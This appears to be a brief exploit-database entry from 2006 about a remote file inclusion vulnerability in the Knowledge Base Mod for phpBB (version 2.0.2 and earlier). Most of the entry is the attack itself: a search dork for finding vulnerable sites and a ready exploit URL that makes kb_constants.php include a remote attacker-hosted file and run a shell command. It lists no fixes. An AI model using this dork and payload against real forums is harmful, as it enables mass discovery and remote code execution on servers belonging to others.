Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability

2006-04-29 00:00:00

Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
Dork: "Powered by Knowledge Base"
Credits: [Oo]

Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.